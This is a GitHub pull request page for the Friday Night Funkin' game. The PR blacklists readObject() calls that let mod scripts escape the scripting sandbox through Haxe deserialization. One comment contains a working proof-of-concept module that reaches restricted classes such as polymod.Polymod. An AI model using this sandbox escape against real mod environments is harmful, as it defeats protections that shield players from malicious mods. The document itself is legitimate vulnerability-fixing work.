Skip to content

[VULNERABILITY] Blacklist readObject() functions#7018

Merged
Hundrec merged 1 commit intoFunkinCrew:dummy/develop-v0.8.3from
charlesisfeline:no-more-using-unserializer-guys
Mar 20, 2026
Merged

[VULNERABILITY] Blacklist readObject() functions#7018
Hundrec merged 1 commit intoFunkinCrew:dummy/develop-v0.8.3from
charlesisfeline:no-more-using-unserializer-guys

Conversation

@charlesisfeline
Copy link
Copy Markdown
Contributor

@charlesisfeline charlesisfeline commented Feb 27, 2026
edited
Loading

Description

blacklists the readObject() function in ByteArrayData, FileStream, and Socket since they all return Unserializer.run if encoded in HXSF format.
btw do note that for the exploit to work, they have to be serialized properly

if i see Unserializer one more time im gonna shit myself

(yes ik FileStream and Socket aren't compiled in even without DCE but still, this prevents scripts from using it even when #7115 gets merged)

@github-actions github-actions Bot added size: small A small pull request with 10 or fewer changes. pr: haxe PR modifies game code. status: pending triage Awaiting review. and removed size: small A small pull request with 10 or fewer changes. labels Feb 27, 2026
@charlesisfeline charlesisfeline changed the title [CHORE blacklist readObject from scripts [CHORE] Blacklist readObject from scripts Feb 27, 2026
@charlesisfeline charlesisfeline changed the title [CHORE] Blacklist readObject from scripts [VULNERABILITY/CHORE] Blacklist readObject() functions Feb 27, 2026
TechnikTil
TechnikTil approved these changes Feb 28, 2026
View reviewed changes
Copy link
Copy Markdown
Contributor

@TechnikTil TechnikTil left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

image

FuroYT
FuroYT approved these changes Feb 28, 2026
View reviewed changes
Copy link
Copy Markdown
Contributor

@FuroYT FuroYT left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

as the leader of the EliteMasters we approve this pull request

image

@Hundrec Hundrec added type: security vulnerability Involves a security vulnerability within the game. size: small A small pull request with 10 or fewer changes. labels Feb 28, 2026
@TechnikTil
Copy link
Copy Markdown
Contributor

TechnikTil commented Mar 2, 2026 

import funkin.modding.module.Module;
import openfl.utils.ByteArrayData;
import haxe.io.Bytes;

class ByteArrayExploit extends Module
{
  public function new()
  {
    super('byteArrayExploit');
  }

  public function onCreate(event:ScriptEvent)
  {
    var typeSerialized:String = "Ay4:Type"; // representation of the type class inside of HXSF.

    // turn it into bytes that the reader can read
    var byteArrayWriter:ByteArrayData = new ByteArrayData();
    byteArrayWriter.writeUTF(typeSerialized);

    // create bytearray with those bytes we wrote, and make sure it uses hxsf so it reads properly.
    var byteArrayReader:ByteArrayData = ByteArrayData.fromBytes(byteArrayWriter);
    byteArrayReader.objectEncoding = 10;

    // resolve class evilly
    var type = byteArrayReader.readObject();
    var polymore = type.resolveClass('polymod.Polymod');
    throw polymore.listModFiles(); // if this throws the right thing, then it works!
    super.onCreate(event);
  }
}

heres a module to test this exploit:

@charlesisfeline charlesisfeline force-pushed the no-more-using-unserializer-guys branch from 1dad310 to 671c152 Compare March 11, 2026 23:44
@github-actions github-actions Bot added size: tiny A tiny pull request with 4 or fewer changes. and removed size: small A small pull request with 10 or fewer changes. labels Mar 11, 2026
@github-actions github-actions Bot added size: small A small pull request with 10 or fewer changes. and removed size: tiny A tiny pull request with 4 or fewer changes. labels Mar 11, 2026
@charlesisfeline
Copy link
Copy Markdown
Contributor Author

charlesisfeline commented Mar 11, 2026

idk havent done rebasing before ;-;

@charlesisfeline charlesisfeline force-pushed the no-more-using-unserializer-guys branch from 74ad634 to 1a04e35 Compare March 12, 2026 00:10
@github-actions github-actions Bot added size: tiny A tiny pull request with 4 or fewer changes. and removed size: small A small pull request with 10 or fewer changes. labels Mar 12, 2026
@github-actions github-actions Bot added size: small A small pull request with 10 or fewer changes. and removed size: tiny A tiny pull request with 4 or fewer changes. labels Mar 12, 2026
@charlesisfeline charlesisfeline force-pushed the no-more-using-unserializer-guys branch from 54c5ff3 to df431df Compare March 12, 2026 00:18
@EliteMasterEric EliteMasterEric force-pushed the no-more-using-unserializer-guys branch from df431df to 4270822 Compare March 12, 2026 15:52
EliteMasterEric
EliteMasterEric approved these changes Mar 12, 2026
View reviewed changes
Copy link
Copy Markdown
Member

@EliteMasterEric EliteMasterEric left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

For the record, blacklisting classes is not a CHORE, that label is reserved purely for pull requests with no functional changes (or at least no intended functional changes).

@EliteMasterEric EliteMasterEric added this to the 0.8.4 milestone Mar 12, 2026
@charlesisfeline charlesisfeline changed the title [VULNERABILITY/CHORE] Blacklist readObject() functions [VULNERABILITY] Blacklist readObject() functions Mar 12, 2026
@EliteMasterEric
Copy link
Copy Markdown
Member

EliteMasterEric commented Mar 12, 2026

also YOU STOLE MY EMOJI

AFTER ALL I'VE DONE FOR YOU PEOPLE

@FuroYT
Copy link
Copy Markdown
Contributor

FuroYT commented Mar 12, 2026

:eric_whoopsies:

@anysad
Copy link
Copy Markdown
Contributor

anysad commented Mar 12, 2026

also YOU STOLE MY EMOJI

AFTER ALL I'VE DONE FOR YOU PEOPLE

image

@TechnikTil
Copy link
Copy Markdown
Contributor

TechnikTil commented Mar 12, 2026

also YOU STOLE MY EMOJI

AFTER ALL I'VE DONE FOR YOU PEOPLE


whoopsie!

@requazar
Copy link
Copy Markdown

requazar commented Mar 12, 2026

also YOU STOLE MY EMOJI

AFTER ALL I'VE DONE FOR YOU PEOPLE

68747470733a2f2f63646e2e646973636f72646170702e636f6d2f656d6f6a69732f313338343931333034303035303439313534322e776562703f73697a653d34303936.webp

@Hundrec Hundrec added status: reviewing internally Under consideration and testing. and removed status: pending triage Awaiting review. labels Mar 13, 2026
@Hundrec Hundrec removed this from the 0.8.4 milestone Mar 13, 2026
@Hundrec Hundrec changed the base branch from develop to dummy/develop-v0.8.3 March 20, 2026 01:57
@Hundrec Hundrec added status: accepted PR was approved for contribution. If it's not already merged, it may be merged on a private branch. and removed status: reviewing internally Under consideration and testing. labels Mar 20, 2026
@Hundrec Hundrec added this to the 0.8.4 milestone Mar 20, 2026
@Hundrec Hundrec merged commit ff4278d into FunkinCrew:dummy/develop-v0.8.3 Mar 20, 2026
6 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@EliteMasterEric EliteMasterEric EliteMasterEric approved these changes

+2 more reviewers

@TechnikTil TechnikTil TechnikTil approved these changes

@FuroYT FuroYT FuroYT approved these changes

Reviewers whose approvals may not affect merge requirements

Assignees

No one assigned

Labels

pr: haxe PR modifies game code. size: small A small pull request with 10 or fewer changes. status: accepted PR was approved for contribution. If it's not already merged, it may be merged on a private branch. type: security vulnerability Involves a security vulnerability within the game.

Milestone

0.8.4

Development

Successfully merging this pull request may close these issues.

7 participants

@charlesisfeline @TechnikTil @EliteMasterEric @FuroYT @anysad @requazar @Hundrec